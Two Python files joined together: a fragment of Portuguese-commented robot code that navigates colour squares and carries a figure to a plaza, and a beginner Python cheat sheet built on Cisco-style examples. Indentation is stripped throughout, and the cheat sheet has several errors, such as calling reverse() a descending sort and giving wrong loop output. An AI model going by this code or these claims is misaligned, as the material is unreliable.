rodas.on(-20,-20)
time.sleep(0.1)
rodas.off()
def andar_frente():#Corrigir todos os tempos presentes aqui a fim de utilizar com o robo e pista finais
global cor_atual,tentativa,quads,c,plaza,memoria_cor
#Vai para frente até ver Black, retorna o tempo percorrido
while 1:
# print(c)
if(c=='Black'):
rodas.off()
retorno()
return
elif c!='White' and c!='Black': #deve ser verdaeiro para uma cor nova diferente de preto e branco
#print(Corfimar_cor(c))
if(Confirmar_cor(c)):
verificar_plaza()
if(len(quads)>0 and plaza==False):memoria_cor[cor_atual]=orientacao
if(plaza==False):quads.append(c)
cor_atual=c
if cor_atual!='White' or cor_atual!='Black':
print('ACHEI: ',cor_atual)
tentativa=0
rodas.off()
procurar_proximo()
alinha(0.01,245,15)
return
while c=='White':
#Anda pelo branco em procura do boneco se a mochila nao esta carregada(mochila==0).Senão apenas anda para frente no branco
procurar_passageiro()
def virar(graus):#função de virada relativa a posiçao
#0.666 é o fator de tempo da virada, alterar para virar 90 graus corretamente e caso mude a velocidade de virada, mude-o de acordo
if graus<0:
if c == 'Red':
rodas.on_for_rotations(-40,40,abs(graus)*(0.770/90))
else:
rodas.on_for_rotations(-40,40,abs(graus)*(0.683/90))
elif(graus==0): pass
else:
if c == 'Red':
rodas.on_for_rotations(40,-40,abs(graus)*(0.770/90))
else:
rodas.on_for_rotations(40,-40,abs(graus)*(0.683/90))#FROM HELL
def procurar_proximo():#função de virar conforme o aprendido, ou a falta dele
global tentativa,cor_atual,orientacao
if (cor_atual not in memoria_cor.keys()):
if (tentativa == 0):
virar(90)
orientacao = 90
if (tentativa == 1):
virar(-90)
orientacao = 0
if (tentativa == 2):
virar(-90)
orientacao = -90
else:virar(memoria_cor[cor_atual])
#Essa função deve conseguir servir para 4 casos(Oque aparecer na lista é o que ele deve tentar pois não conhece):
#1:Direita->Frente->Esquerda(Não conhece nada)
#2:Direita->Esquerda(conhece frente/0)
#3:Frente->Esquerda(conhece direita/90)
#4:Esquerda(conhece direita/90 e frente/0)
#FIM DAS FUNÇÔES DE LOCOMOÇÂO
#FUNÇÕES DE COR
def media(leitura1, leitura2): # FAZ A MÈDIA DAS LEITURAS DOS AMBOS SENSORES
media = []
for x in range(3):
media.append((leitura1[x]+leitura2[x])/2)
return tuple(media)
def cor_mais_proxima(leitura):
global cores
min = 1000
for valor in cores.values():
# DISTANCIA EUCLIDIANA DO VALOR DA LEITURA DO SENSOR QUE FOI USADO COMO ENTRADA COM OS VALORES DAS CORES CALIBRADAS PREVIAMENTE
dist = sqrt(((leitura[0]-valor[0])**2) +
((leitura[1]-valor[1])**2)+((leitura[2]-valor[2])**2))
if(dist < min): # verifica se é menor que o ultimo verificado
min = dist
for key, value in cores.items(): # pega o nome da cor que gerou a menor distancia
if value == valor:
cor = key
return cor
def diferente_de(*cor):
global c
if c not in cor:
return 1
else: return 0
def cor_th():
global c,d
while(1):
c=cor_mais_proxima(Sensor_direita.rgb)
d=Sensor_direita.rgb
def Confirmar_cor(cor_vista):
global c
time.sleep(0.2)
if(c==cor_vista):
cor_atual=c
return True
else:
atualD = d[0]+d[1]+d[2]
if atualD<80:
naocaia()
return False
#FIM DAS FUNÇÕES DE COR
#FUNÇÕES DO PLAZA
def verificar_plaza():
global c, mochila, quad, cor_atual, plaza,velocidade
if(1):
if c!='Black':
mudanca = 0
cor_momento = c
goiaba = Thread(target=rodas.on_for_seconds, args=(-15, -15, 32.22/15,))#32.22 =fator de tempo para o mesmo ir até o meio do quadrado COLORIDO
#Caso altere a velocidade de 15(Caso nao esteja conseguindo subir a rampa), diminua esse fator de acordo
goiaba.start()
while(goiaba.is_alive()):
#print("Checando plaza: ",mudanca)
if (cor_momento != c):
mudanca += 1
cor_momento = c
if(mudanca >= 2):
print("PLAZA")
pickle.dump(quads,open('memoria.p','wb'))#Armazena os quadrados vistos para debugs futuros
plaza=True #Plaza encontrado
quads.append(quad(cor_atual))#coloca o ultimo quadrado antes do plaza no array
tempo=time.time()
rodas.on(-30,-30)
while(c!='Black'):
rodas.on(-(SpeedPercent(velocidade)*1.35), -(SpeedPercent(velocidade)*1.35))
if(diferente_de('Black','White')):
if(Confirmar_cor(c)):
rodas.off()
return
if(plaza==True):
rodas.on(-25,-35)
time.sleep(3)
rodas.off()
time.sleep(49.5/SpeedPercent(velocidade))#esse tempo serve para ele voltar alem das faixas do plaza, não é necessario alterar
par=mochila
solte()#deixa o BONECO
mochila=False
rodas.on_for_seconds((SpeedPercent(velocidade)*1.35), (SpeedPercent(velocidade)*1.35), time.time()-tempo)
while(c=='White'):rodas.on(SpeedPercent(velocidade),SpeedPercent(velocidade))
rodas.on_for_seconds(SpeedPercent(velocidade), SpeedPercent(velocidade), 8/SpeedPercent(velocidade))
#8 deve ser o mesmo fator de tempo do retorno
rodas.off()
if par==True:Mochila_sobe()
virar(180)
Volta()
else:pass
goiaba.join()
rodas.off()
def Volta():
global quads,mochila,start_time,c,velocidade
i=len(quads)-2#Indice para o robo ir somente até o ultimo quadrado
while(i>0 and mochila==False):#Se quiser que o robo vá até o ultimo: Tire a condição da mochila
if c!='White':
print(memoria_cor[c])
virar((memoria_cor[c])*(-1))
alinha(0.01,245,15)
procurar_passageiro()
time.sleep(35.22/SpeedPercent(velocidade))#Mesmo fator de tempo do verificar_plaza(ENTRADA DE COLORIDO).
rodas.off()
if(mochila==True ):
virar(90)
virar(90)
alinha(0.01,245,15)
while(c!='White'):rodas.on(-SpeedPercent(velocidade),-SpeedPercent(velocidade))
rodas.off()
break
i-=1
#if sensor detectar algo retorna start_time e execute a função de pegar o boneco
if(i==0):
virar(90)
virar(90)
while(c!='White'):rodas.on(-SpeedPercent(velocidade),-SpeedPercent(velocidade))
rodas.off()
procurar_passageiro()
verificar_plaza()
#FIM DAS FUNÇÕES DO PLAZA
def naocaia():
global d
atualD = d[0]+d[1]+d[2]
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
if atualE< 40:
rodas.on(-SpeedPercent(velocidadeFrente+30), -SpeedPercent(velocidadeFrente-5))
if atualD< 40:
rodas.on(-SpeedPercent(velocidadeFrente-5), -SpeedPercent(velocidadeFrente+30))
#FUNÇÕES DA MOCHILA(EQUIPAMENTO DE CAPTURAR BONECO)
def procurar_passageiro():
global mochila,c,velocidadeFrente
while c == 'White':
naocaia()
rodas.on(-SpeedPercent(velocidadeFrente), -SpeedPercent(velocidadeFrente+0.5))
# if Sensor_sonic.distance_centimeters<30 and mochila==0 :
# rodas.off()
# pega()
def Mochila_desce():
Mochila.on_for_rotations(SpeedPercent(20), 0.53) ## negativo sobe
def Mochila_solta():
Mochila.on_for_rotations(SpeedPercent(20),0.25)
def Mochila_pega():
Mochila.on_for_rotations(SpeedPercent(-20), 0.25)
def Mochila_sobe():
Mochila.on_for_rotations(SpeedPercent(-20), 0.53)
def solte():
global mochila
rodas.off()
if(mochila==True):
Mochila_solta()
def pega():
global mochila
dist = Sensor_sonic.distance_centimeters
time.sleep(0.5)
rodas.off()
Mochila_desce()
virar(90)
time.sleep(1)
rodas.on_for_seconds(-20,-20,dist*0.05)#regular o valor de forma ao robo pegar o boneco
Mochila_pega()
time.sleep(1)
mochila=True
rodas.on_for_seconds(20,20,dist*0.05)
virar(-90)
rodas.off()
#FIM DAS FUNÇÕES DE MOCHILA
#FUNÇÕES DE INFORMAÇÃO
class quad:#objeto que guarda informações do ponto de referencia encontrado
def __init__(self,cor):
self.cor = cor
# self.tempo = tempo
# self.orientacao=orientacao
#FIM DAS FUNÇÕES DE INFORMAÇÃO
print("Vamos comecar!", end=' \r')
if __name__=="__main__":
start_time=0
plaza = False
ver_cor = Thread(target=cor_th)
ver_cor.daemon=True
ver_cor.start()
time.sleep(0.5)
Mochila_sobe()
while (1):
andar_frente()
#print(c)
#procurar_passageiro()
#virar(-90)
#rodas.on_for_degrees(-40,-40,90)
#time.sleep(2)
#curva.on_for_degrees(50,40,40,660)
#time.sleep(0.3)
# if (tuts=0):#se ver Preto retorna até o ponto de referencia de onde saiu
# retorno()
# # se ver um novo ponto de referencia atualiza a memoria de tal cor, coloca na lista informações relativas ao descoberto e ao ultimo ligado a ele
# if (tuts=1):
# print ('Achei: ',c)
# tentativa=0#reseta a variavel tentativas o que indica que é um novo quadrado
# if(plaza==False and len(quads)>0):
# memoria_cor[cor_atual]=orientacao
# quads.append(quad(cor_atual))
|
pythonexammples.py
|
input("Please enter the string you want to be printed out: ") #raw_input() in Python 2; input() in Python 3
#Saving the input to a variable
user_says = input("Please enter the string you want to be printed out: ")
#Defining a variable
my_var = 10 #type integer
my_var = "Hello" #type string
my_var = True #type boolean
#Strings - indexing
a = "Cisco Switch"
a.index("i")
#Strings - character count
a = "Cisco Switch"
a.count("i")
#Strings - finding a character
a = "Cisco Switch"
a.find("sco")
#Strings - converting the case
a = "Cisco Switch"
a.lower() #lowercase
a.upper() #uppercase
#Strings - checking whether the string starts with a character
a = "Cisco Switch"
a.startswith("C")
#Strings - checking whether the string ends with a character
a = "Cisco Switch"
a.endswith("h")
#Strings - removing a character from the beginning and the end of a string
a = " Cisco Switch "
a.strip() #remove whitespaces
b = "$$$Cisco Switch$$$"
b.strip("$") #remove a certain character
#Strings - removing all occurences of a character from a string
a = " Cisco Switch "
a.replace(" ", "") #replace each space character with the absence of any character
#Strings - splitting a string by specifying a delimiter; the result is a list
a = "Cisco,Juniper,HP,Avaya,Nortel" #the delimiter is a comma
a.split(",")
#Strings - inserting a character in between every two characters of the string / joining the characters by using a delimiter
a = "Cisco Switch"
"_".join(a)
#Additional methods (source: https://www.tutorialspoint.com/python3/python_strings.htm)
capitalize()
#Capitalizes first letter of string.
lstrip()
#Removes all leading whitespace in string.
rstrip()
#Removes all trailing whitespace of string.
swapcase()
#Inverts case for all letters in string.
title()
#Returns "titlecased" version of string, that is, all words begin with uppercase and the rest are lowercase.
isalnum()
#Returns true if string has at least 1 character and all characters are alphanumeric and false otherwise.
isalpha()
#Returns true if string has at least 1 character and all characters are alphabetic and false otherwise.
isdigit()
#Returns true if string contains only digits and false otherwise.
islower()
#Returns true if string has at least 1 cased character and all cased characters are in lowercase and false otherwise.
isnumeric()
#Returns true if a unicode string contains only numeric characters and false otherwise.
isspace()
#Returns true if string contains only whitespace characters and false otherwise.
istitle()
#Returns true if string is properly "titlecased" and false otherwise.
isupper()
#Returns true if string has at least one cased character and all cased characters are in uppercase and false otherwise.
#Strings - concatenating two or more strings
a = "Cisco"
b = "2691"
a + b
#Strings - repetition / multiplying a string
a = "Cisco"
a * 3
#Strings - checking if a character is or is not part of a string
a = "Cisco"
"o" in a
"b" not in a
#Strings - formatting v1
"Cisco model: %s, %d WAN slots, IOS %f" % ("2600XM", 2, 12.4)
"Cisco model: %s, %d WAN slots, IOS %.f" % ("2600XM", 2, 12.4)
"Cisco model: %s, %d WAN slots, IOS %.1f" % ("2600XM", 2, 12.4)
"Cisco model: %s, %d WAN slots, IOS %.2f" % ("2600XM", 2, 12.4)
#Strings - formatting v2
"Cisco model: {}, {} WAN slots, IOS {}".format("2600XM", 2, 12.4)
"Cisco model: {0}, {1} WAN slots, IOS {2}".format("2600XM", 2, 12.4)
#Strings - slicing
string1 = "O E2 10.110.8.9 [160/5] via 10.119.254.6, 0:01:00, Ethernet2"
string1[5:15] #slice starting at index 5 up to, but NOT including, index 15; so index 14 represents the last element in the slice
string1[5:] #slice starting at index 5 up to the end of the string
string1[:10] #slice starting at the beginning of the string up to, but NOT including, index 10
string1[:] #returns the entire string
string1[-1] #returns the last character in the string
string1[-2] #returns the second to last character in the string
string1[-9:-1] #extracts a certain substring using negative indexes
string1[-5:] #returns the last 5 characters in the string
string1[:-5] #returns the string minus its last 5 characters
string1[::2] #adds a third element called step; skips every second character of the string
string1[::-1] #returns string1's elements in reverse order
#Numbers
num1 = 10
num2 = 2.5
type(num1) #checking the type of this variable; integer
type(num2) #checking the type of this variable; float
#Numbers - math operations
1 + 2 #addition
2 – 1 #subtraction
4 / 2 #division
4 * 2 #multiplication
4 ** 2 #raising to a power
5 % 2 #modulo (this means finding out the remainder after division of one number by another)
#Numbers - float division vs. integer division (special case)
3 / 2 #float division; result is 1 in Python 2 and 1.5 in Python 3
3 // 2 #integer division; result is 1 in Python 2 and Python 3
#Numbers - order of evaluation in math operations
#Highest priority: raising to a power; Medium priority: division, multiplication and modulo; Low priority: addition and subtraction
100 - 5 ** 2 / 5 * 2 #1st: 5 ** 2, second: / then *, third - ; result is 90.0
#Numbers - conversion between numeric types
int(1.5) #result is 1
float(2) #result is 2.0
#Numbers - useful functions
abs(5) #the distance between the number in between parantheses and 0
abs(-5) #returns the same result as abs(5)
max(1, 2) #returns the largest number
min(1, 2) #returns the smallest number
pow(3, 2) #another way of raising to a power
#Booleans - logical operations
(1 == 1) and (2 == 2) #result is True; AND means that both operands should be True in order to get the expression evaluated as True
(1 == 1) or (2 == 2) #result is True; when using OR, it is enough if only one expression is True, in order to have True as the final result
not(1 == 1) #result is False; using the NOT operator means denying an expression, in this case denying a True expression
not(1 == 2) #result is True; using the NOT operator means denying an expression, in this case denying a False expression
None, 0, 0.0, 0L, 0j, empty string, empty list, empty tuple, empty dictionary #these values always evaluate to False
bool(None) #returns False; function that evaluates values and expressions
bool(0) #returns False; function that evaluates values and expressions
bool(2) #returns True; function that evaluates values and expressions
bool("router") #returns True; function that evaluates values and expressions
#Lists
list1 = ["Cisco", "Juniper", "Avaya", 10, 10.5, -11] #creating a list
len(list) #returns the number of elements in the list
list1[0] #returns "Cisco" which is the first element in the list (index 0)
list1[0] = "HP" #replacing the first element in the list with another value
#Lists - methods
list2 = [-11, 2, 12]
min(list2) #returns the smallest element (value) in the list
max(list2) #returns the largest element (value) in the list
list1 = ["Cisco", "Juniper", "Avaya", 10, 10.5, -11]
list1.append(100) #appending a new element to the list
del list1[4] #removing an element from the list by index
list1.pop(0) #removing an element from the list by index
list1.remove("HP") #removing an element from the list by value
list1.insert(2, "Nortel") #inserting an element at a particular index
list1.extend(list2) #appending a list to another list
list1.index(-11) #returns the index of element -11
list1.count(10) #returns the number of times element 10 is in the list
list2 = [9, 99, 999, 1, 25, 500]
list2.sort() #sorts the list elements in ascending order; modifies the list in place
list2.reverse() #sorts the list elements in descending order; modifies the list in place
sorted(list2) #sorts the elements of a list in ascending order and creates a new list at the same time
sorted(list2, reverse = True) #sorts the elements of a list in descending order and creates a new list at the same time
list1 + list2 #concatenating two lists
list1 * 3 #repetition of a list
#Lists - slicing (works the same as string slicing, but with list elements instead of string characters)
a_list[5:15] #slice starting at index 5 up to, but NOT including, index 15; so index 14 represents the last element in the slice
a_list[5:] #slice starting at index 5 up to the end of the list
a_list[:10] #slice starting at the beginning of the list up to, but NOT including, index 10
a_list[:] #returns the entire list
a_list[-1] #returns the last element in the list
a_list[-2] #returns the second to last element in the list
a_list[-9:-1] #extracts a certain sublist using negative indexes
a_list[-5:] #returns the last 5 elements in the list
a_list[:-5] #returns the list minus its last 5 elements
a_list[::2] #adds a third element called step; skips every second element of the list
a_list[::-1] #returns a_list's elements in reverse order
#Sets - unordered collections of unique elements
set1 = {"1.1.1.1", "2.2.2.2", "3.3.3.3", "4.4.4.4"} #creating a set
list1 = [11, 12, 13, 14, 15, 15, 15, 11]
string1 = "aaabcdeeefgg"
set1 = set(list1) #creating a set from a list; removing duplicate elements; returns {11, 12, 13, 14, 15}
set2 = set(string1) #creating a set from a string; removing duplicate characters; returns {'b', 'a', 'g', 'f', 'c', 'd', 'e'}; remeber that sets are UNORDERED collections of elements
len(set1) #returns the number of elements in the set
11 in set1 #returns True; checking if a value is an element of a set
10 not in set 1 #returns True; checking if a value is an element of a set
set1.add(16) #adding an element to a set
set1.remove(16) #removing an element from a set
#Frozensets - immutable sets. The elements of a frozenset remain the same after creation.
fs1 = frozenset(list1) #defining a frozenset
fs1
frozenset({11, 12, 13, 14, 15}) #the result
type(fs1)
<class 'frozenset'> #the result
#proving that frozensets are indeed immutable
fs1.add(10)
AttributeError: 'frozenset' object has no attribute 'add'
fs1.remove(1)
AttributeError: 'frozenset' object has no attribute 'remove'
fs1.pop()
AttributeError: 'frozenset' object has no attribute 'pop'
fs1.clear()
AttributeError: 'frozenset' object has no attribute 'clear'
#Sets - methods
set1.intersection(set2) #returns the common elements of the two sets
set1.difference(set2) #returns the elements that set1 has and set2 doesn't
set1.union(set2) #unifying two sets; the result is also a set, so there are no duplicate elements; not to be confused with concatenation
set1.pop() #removes a random element from the set; set elements cannot be removed by index because sets are UNORDERED collections of elements, so there are no indexes to use
set1.clear() #clearing a set; the result is an empty set
#Tuples - immutable lists (their contents cannot be changed by adding, removing or replacing elements)
my_tuple = () #creating an empty tuple
my_tuple = (9,) #creating a tuple with a single element; DO NOT forget the comma
my_tuple = (1, 2, 3, 4)
#Tuples - the same indexing & slicing rules apply as for strings and lists
len(my_tuple) #returns the number of elements in the tuple
my_tuple[0] #returns the first element in the tuple (index 0)
my_tuple[-1] #returns the last element in the tuple (index -1)
my_tuple[0:2] #returns (1, 2)
my_tuple[:2] #returns (1, 2)
my_tuple[1:] #returns (2, 3, 4)
my_tuple[:] #returns (1, 2, 3, 4)
my_tuple[:-2] #returns (1, 2)
my_tuple[-2:] #returns (3, 4)
my_tuple[::-1] #returns (4, 3, 2, 1)
my_tuple[::2] #returns (1, 3)
#Tuples - tuple assignment / packing and unpacking
tuple1 = ("Cisco", "2600", "12.4")
(vendor, model, ios) = tuple1 #vendor will be mapped to "Cisco" and so are the rest of the elements with their corresponding values; both tuples should have the same number of elements
(a, b, c) = (1, 2, 3) #assigning values in a tuple to variables in another tuple
min(tuple1) #returns "12.4"
max(tuple1) #returns "Cisco"
tuple1 + (5, 6, 7) #tuple concatenation
tuple1 * 20 #tuple multiplication
"2600" in tuple1 #returns True
784 not in tuple1 #returns True
del tuple1 #deleting a tuple
#Ranges - unlike in Python 2, where the range() function returned a list, in Python 3 it returns an iterator; cannot be sliced
r = range(10) #defining a range
r
range(0, 10) #the result
type(r)
<class 'range'> #the result
list(r) #converting a range to a list
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9] #the result
list(r)[2:5] #slicing a range by using the list() function first
[2, 3, 4] #the result
#Dictionaries - a dictionary is an unordered set of key-value pairs
dict1 = {} #creating an empty dictionary
dict1 = {"Vendor": "Cisco", "Model": "2600", "IOS": "12.4", "Ports": "4"}
dict1["IOS"] #returns "12.4"; extracting a value for a specified key
dict1["IOS"] = "12.3" #modifies an existing key-value pair
dict1["RAM"] = "128" #adds a new key-value pair to the dictionary
del dict1["Ports"] #deleting a key-value pair from the dictionary
len(dict1) #returns the number of key-value pairs in the dictionary
"IOS" in dict1 #verifies if "IOS" is a key in the dictionary
"IOS2" not in dict1 #verifies if "IOS2" is not a key in the dictionary
#Dictionaries - methods
dict1.keys() #returns a list having the keys in the dictionary as elements
dict1.values() #returns a list having the values in the dictionary as elements
dict1.items() #returns a list of tuples, each tuple containing the key and value of each dictionary pair
#Conversions between data types
str() #converting to a string
int() #converting to an integer
float() #converting to a float
list() #converting to a list
tuple() #converting to a tuple
set() #converting to a set
bin() #converting to a binary representation
hex() #converting to a hexadecimal representation
int(variable, 2) #converting from binary back to decimal
int(variable, 16) #converting from hexadecimal back to decimal
#If / Elif / Else conditionals - executing code based on one or more conditions being evaluated as True or False; the "elif" and "else" clauses are optional
x = 5
if x > 5: #if the "x > 5" expression is evaluated as True, the code indented under the "if" clause gets executed, otherwise the execution jumps to the "elif" clause...
print("x is greater than 5")
elif x == 5: #...if the "x == 5" expression is evaluated as True, the code indented under the "elif" clause gets executed, otherwise the execution jumps to the "else" clause
print("x IS 5")
else: #this covers all situations not covered by the "if" and "elif" clauses; the "else" clause, if present, is always the last clause in the code block
print("x is NOT greater than 5" )
#result of the above "if" block
x IS 5
#For / For Else loops - executes a block of code a number of times, depending on the sequence it iterates on; the "else" clause is optional
vendors = ["Cisco", "HP", "Nortel", "Avaya", "Juniper"]
for element in vendors: #interating over a sequence and executing the code indented under the "for" clause for each element in the sequence
print(element)
else: #the indented code below "else" will be executed when "for" has finished looping over the entire list
print("The end of the list has been reached")
#result of the above "for" block
Cisco
HP
Nortel
Avaya
Juniper
The end of the list has been reached
#While / While Else loops - a while loop executes as long as an user-specified condition is evaluated as True; the "else" clause is optional
x = 1
while x <= 10:
print(x)
x += 1
else:
print("Out of the while loop. x is now greater than 10")
#result of the above "while" block
1 2 3 4 5 6 7 8 9 10
Out of the while loop. x is now greater than 10
#If / For / While Nesting
x = "Cisco"
if "i" in x:
if len(x) > 3: #if nesting
print(x, len(x))
Cisco 5 #result of the above block
list1 = [4, 5, 6]
list2 = [10, 20, 30]
for i in list1:
for j in list2: #for nesting
print(i*j)
10 20 30 20 40 60 30 60 90 #result of the above block
x = 1
while x <= 10:
z = 5
x += 1
while z <= 10: #while nesting
print(z)
z += 1
5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 5 6 7 8 9 10 #result of the above block
for number in range(10):
if 5 <= number <= 9: #mixed nesting
print(number)
5 6 7 8 9 #result of the above block
#Break, Continue, Pass
list1 = [4, 5, 6]
list2 = [10, 20, 30]
for i in list1:
for j in list2:
if j == 20:
break #stops the execution here, ignores the print statement below and completely quits THIS "for" loop; however, it doesn't quit the outer "for" loop, too!
print(i * j)
print("Outside the nested loop")
#result of the above block
40
Outside the nested loop
50
Outside the nested loop
60
Outside the nested loop
list1 = [4, 5, 6]
list2 = [10, 20, 30]
for i in list1:
for j in list2:
if j == 20:
continue #ignores the rest of the code below for the current iteration, then goes up to the top of the loop (inner "for") and starts the next iteration
print(i * j)
print("Outside the nested loop")
#result of the above block
40
120
Outside the nested loop
50
150
Outside the nested loop
60
180
Outside the nested loop
for i in range(10):
pass #pass is the equivalent of "do nothing"; it is actually a placeholder for when you just want to write a piece of code that you will treat later
#Try / Except / Else / Finally - handling an exception when it occurs and telling Python to keep executing the rest of the lines of code in the program
try:
print(4/0) #in the "try" clause you insert the code that you think might generate an exception at some point
except ZeroDivisionError:
print("Division Error!") #specifying what exception types Python should expect as a consequence of running the code inside the "try" block and how to handle them
else:
print("No exceptions raised by the try block!") #executed if the code inside the "try" block raises NO exceptions
finally:
print("I don't care if an exception was raised or not!") #executed whether the code inside the "try" block raises an exception or not
#result of the above block
Division Error!
I don't care if an exception was raised or not!
#Functions - Basics
def my_first_function(x, y): #defining a function that takes two parameters
sum = x + y
return sum #this statement is used to exit a function and return something when the function is called
my_first_function(1, 2) #calling a function and passing two POSITIONAL arguments, the values of 1 and 2; result is 3
my_first_function(x = 1, y = 2) #calling a function and passing two KEYWORD arguments, the values of 1 and 2; result is 3
my_first_function(1, y = 2) #calling a function and passing mixed types of arguments, the values of 1 and 2; result is 3; rule: positional arguments always before keyword arguments!
def my_first_function(x, y, z = 3): #specifying a default parameter value in a function definition
def my_first_function(x, *args) #specifying a variable number of positional parameters in a function definition; args is a tuple
def my_first_function(x, **kwargs) #specifying a variable number of keyword parameters in a function definition; args is a tuple
global my_var #"importing" a variable in the global namespace to the local namespace of a function
#Modules and importing - Basics
import sys #importing the sys module; the import statements should be placed before any other code in your application
from math import pi #importing only a variable (pi) from the math module
from math import sin #importing only a function (sin()) from the math module; there's no need to add the parantheses of the function when importing it
from math import * #importing all the names (variables and functions) from the math module
#Files - opening and reading a file
myfile = open("routers.txt", "r") #"r" is the file access mode for reading and it is the default mode when opening a file
myfile.mode #checking the mode in which a file has been opened
myfile.read() #method that returns the entire content of a file in the form of a string
myfile.read(5) #returning only the first 5 characters (bytes) in the file
myfile.seek(0) #moving the cursor at the beginning of the file
myfile.tell() #checking the current position of the cursor inside the file
myfile.readline() #returns the file content one line a ta time, each time you use the method
myfile.readlines() #returns a list where each element is a line in the file
#Files - writing and appending to a file
newfile = open("newfile.txt", "w") #opens/creates a new file for writing; the "w" method also creates the file for writing if the file doesn’t exist and overrides the file if the file already exists; remember to close the file after writing to it to save the changes!
newfile.writelines(["Cisco", "Juniper", "HP", "\n"]) #this method takes a sequence of strings as an argument and writes those strings to the file
newfile = open("newfile.txt", "a") #opening a file for appending
newfile = open("newfile.txt", "w+") #opens a file for both writing and reading at the same time
newfile = open("newfile.txt", "x") #opens for exclusive creation, failing if the file already exists
#Files - closing a file
newfile.closed #checking if a file is closed
newfile.close() #closing a file
with open("python.txt", "w") as f: #using the with-as solution, the files gets closed automatically, without needing the close() method
f.write("Hello Python!\n")
#Regular Expressions - the "re.match" and "re.search" methods
a = re.match(pattern, string, optional flags) #general match syntax; "a" is called a match object if the pattern is found in the string, otherwise "a" will be None
mystr = "You can learn any programming language, whether it is Python2, Python3, Perl, Java, javascript or PHP."
import re #importing the regular expressions module
a = re.match("You", mystr) #checking if the characters "You" are indeed at the beginning of the string
a.group() #result is 'You'; Python returns the match it found in the string according to the pattern we provided
a = re.match("you", mystr, re.I) #re.I is a flag that ignores the case of the matched characters
a = re.search(pattern, string, optional flags) #general search syntax; searching for a pattern throughout the entire string; will return a match object if the pattern is found and None if it's not found
arp = "22.22.22.1 0 b4:a9:5a:ff:c8:45 VLAN#222 L"
a = re.search(r"(.+?) +(\d) +(.+?)\s{2,}(\w)*", arp) #result is '22.22.22.1'; 'r' means the pattern should be treated like a raw string; any pair of parentheses indicates the start and the end of a group; if a match is found for the pattern inside the parentheses, then the contents of that group can be extracted with the group() method applied to the match object; in regex syntax, a dot represents any character, except a new line character; the plus sign means that the previous expression, which in our case is just a dot, may repeat one or more times; the question mark matching as few characters as possible
a.groups() #returns all matches found in a given string, in the form of a tuple, where each match is an element of that tuple
('22.22.22.1', '0', 'b4:a9:5a:ff:c8:45 VLAN#222', 'L')
#Regular Expressions - the "re.findall" and "re.sub" methods
a = re.findall(r"\d\d\.\d{2}\.[0-9][0-9]\.[0-9]{1,3}", arp) #returns a list where each element is a pattern that was matched inside the target string
['22.22.22.1'] #result of the above operation - a list with only one element, the IP address matched by the regex
b = re.sub(r"\d", "7", arp) #replaces all occurrences of the specified pattern in the target string with a string you enter as an argument
'77.77.77.7 7 b7:a7:7a:ff:c7:77 VLAN#777 L 77.77.77.77' #result of the above operation
#Classes and objects
class MyRouter(object) #creating a class which inherts from the default "object" class
def __init__(self, routername, model, serialno, ios): #class constructor; initializing some variables and the method is called whenever you create a new instance of the class
self.routername = routername #"self" is a reference to the current instance of the class
self.model = model
self.serialno = serialno
self.ios = ios
def print_router(self, manuf_date):
print("The router name is: ", self.routername)
print("The router model is: ", self.model)
print("The serial number of: ", self.serialno)
print("The IOS version is: ", self.ios)
print("The model and date combined: ", self.model + manuf_date)
router1 = MyRouter('R1', '2600', '123456', '12.4') #creating an object by simply calling the class name and entering the arguments required by the __init__ method in between parentheses
router1.model #accessing the object's attributes; result is '2600'
router1.print_router("20150101") #accessing a function (actually called method) from within the class
The router name is: R1
The router model is: 2600
The serial number of: 123456
The IOS version is: 12.4
The model and date combined: 260020150101
getattr(router2, "ios") #getting the value of an attribute
setattr(router2, "ios", "12.1") #setting the value of an attribute
hasattr(router2, "ios") #checking if an object attribute exists
delattr(router2, "ios") #deleting an attribute
isinstance(router2, MyRouter) #verifying if an object is an instance of a particular class
class MyNewRouter(MyRouter): #creating a new class (child) inheriting from the MyRouter parent class
...
issubclass(MyNewRouter, MyRouter) #returns True or False; checking if a class is the child of another class
#List / Set / Dictionary comprehensions
#Instead of...
list1 = []
for i in range(10):
j = i ** 2
list1.append(j)
#...we can use a list comprehension
list2 = [x ** 2 for x in range(10)]
list3 = [x ** 2 for x in range(10) if x > 5] #with a conditional statament
set1 = {x ** 2 for x in range(10)} #set comprehension
dict1 = {x: x * 2 for x in range(10)} #dictionary comprehension
#Lambda functions - anonymous functions
lambda arg1, arg2, ..., arg n: an expression using the arguments #general syntax
a = lambda x, y: x * y #defining a lambda function
a(20, 10) #result is 200; calling the lambda function
#Instead of...
def myfunc(list):
prod_list = []
for x in range(10):
for y in range(5):
product = x * y
prod_list.append(product)
return prod_list + list
#...we can use a lambda function, a list comprehension and concatenation on a single line of code
b = lambda list: [x * y for x in range(10) for y in range(5)] + list
#Map and Filter
#map() - takes a function and a sequence as arguments and applies the function to all the elements of the sequence, returning a list as the result
def product10(a):
return a * 10
list1 = range(10)
map(product10, list1) #result is [0, 10, 20, 30, 40, 50, 60, 70, 80, 90]; applying the product10() function to each element of list1
#or...
map((lambda a: a * 10), list1) #result is [0, 10, 20, 30, 40, 50, 60, 70, 80, 90] as well
#filter() - takes a function and a sequence as arguments and extracts all the elements in the list for which the function returns True
filter(lambda a: a > 5, list1) #result is [6, 7, 8, 9]
#Iterators - an object which allows a programmer to traverse through all the elements of a collection
my_list = [1, 2, 3, 4, 5, 6, 7]
my_iter = iter(my_list) #iter() returns an interator object
next(my_iter) #in Python 2 and 3, it returns the elements of a sequence one by one; raises StopIteration when the sequence is exhausted
#Generators - special routines that can be used to control the iteration behavior of a loop; defined using the "def" keyword;
def my_gen(x, y): #creating a generator function
for i in range(x):
print("i is %d" % i)
print("y is %d" % y)
yield i * y #yields the values one at a time; traversing a sequence up to a certain point, getting the result and suspending the execution
my_object = my_gen(10, 5) #creating a generator object
next(my_object) #manually yield the next element returned by the my_gen() function; raises StopIteration when the sequence is exhausted
gen_exp = (x for x in range(5)) #creating a generator expression; similar to list comprehensions, but using parentheses instead of square brackets
next(gen_exp) #extracting each value in the list generated by range(5), one value at a time; raises StopIteration when the sequence is exhausted
#Itertools - built-in Python module for working with iterable data sets
import itertools
list1 = [1, 2, 3, 'a', 'b', 'c']
list2 = [101, 102, 103, 'X', 'Y']
#chain() - takes several sequences and chains them together
chain(list1, list2)
